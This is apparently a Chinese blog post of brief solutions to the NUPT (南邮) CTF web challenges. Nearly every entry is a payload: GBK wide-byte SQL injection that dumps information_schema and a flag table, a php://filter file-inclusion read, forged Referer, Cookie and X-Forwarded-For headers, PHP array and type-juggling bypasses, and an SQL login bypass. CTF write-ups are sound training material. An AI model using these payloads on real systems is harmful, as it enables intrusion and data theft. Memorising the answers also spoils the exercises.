南邮ctf web

Author Avatar
Geroge Lee 3月 29, 2017
  • 在其它设备中阅读本文章

签到题

查看源码就可得到

md5 collision

Poc:a=240610708

<!--more-->

签到2

关键点:输入框设定了最大的长度限制

层层递进

在iframe标签属性都为0,查看链接,一直点下去发现404.html,16行-35行,getflag

AAencode

AAencode

单身二十年

源码点击./search_key.php,getflag

你从哪里来

referer: http://www.google.com

文件包含

Poc:file=php://filter/convert.base64-encode/resource=index.php

单身一百年也没用

点击到这里找key,查看响应头,getflag

Download~!

Poc:url=ZG93bmxvYWQucGhw

COOKIE

Cookie: Login=1

MYSQL

1、查看robots.txt

2、sql.php?id=1024.00001

sql injection 3

id=2,gbk

id=1%df' union select 1,2 --+

id=1%df' union select database(),2 --+

回显sqli

id=1%df' union select 1,table_name from information_schema.tables where table_schema=0x73716C6931

回显 falg

id=1%df' union select 1,cloumn_name from information_schema.columns where table_schema=0x73716C6931

回显 fl4g

id=1%df' union select 1,fl4g from flag --+

/x00

Poc:nctf[]=1.#biubiubiu

bypass again

Poc:a[]=1&b[]=2

变量覆盖

POST:pass=123&thepassword_123=123

PHP是世界上最好的语言

Poc:id=%2568ackerDJ

伪装者

x-forwarded-for: 127.0.0.1

上传绕过

截断 截断上传绕过

SQL注入1

admin')#&111

pass check

输入123,抓包改为传入数组

起名字真难

Poc:key=0xccccccccc